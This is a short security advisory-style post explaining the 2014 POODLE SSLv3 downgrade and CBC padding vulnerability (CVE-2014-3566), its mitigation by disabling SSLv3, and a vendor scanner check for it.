On October 14th a new CVE was added to the ever-growing list of critical Transport Layer Security (TLS) vulnerabilities discovered in 2014. Dubbed “Poodle” (Padding Oracle On Downgraded Legacy Encryption), CVE-2014-3566 explains a new protocol-downgrade issue targeting SSLv3. An active attacker could use this vulnerability to obtain part of the encrypted SSL communication, such as secure cookies that may contain authentication tokens and other critical data, in plain text.
A downgrade attack is a common phenomenon leveraging man-in-the-middle (MitM) conditions. An attacker with an ability to alter secure network traffic can trick both parties into downgrading to earlier versions of an SSL protocol supported by both of them (e.g. TLSv1 instead of TLS1.1 or SSLv3 instead of TLSv1). The attacker may then leverage other protocol weaknesses such as a weak cipher suite or key strength to gain access to secure communication. Previously well-known downgrade attacks include version rollback attacks. SSLv3 contains a provision to prevent unnecessary downgrade to SSLv2. However, TLS versions are missing any such provision.
This vulnerability leverages protocol downgrade to SSLv3 and then padding attacks on CBC mode ciphers. Since the alternate to CBC mode ciphers is RC4, which is already known to be weak, disabling SSLv3 is the recommended mitigation technique to achieve desired level of security through encrypted connection . Even though the TLS_FALLBACK_SCSV mechanism has also been recommended to prevent downgrade attacks, effectiveness of this mechanism is dependent on both client and server implementing it. As of this posting only a few browsers support it, so it may not effectively prevent Poodle attacks in all cases.
Security Research has added a check to detect SSLv3 support on the target server along with CBC mode cipher list via Web Inspect. Details of how to leverage this feature can be found on the Security blog.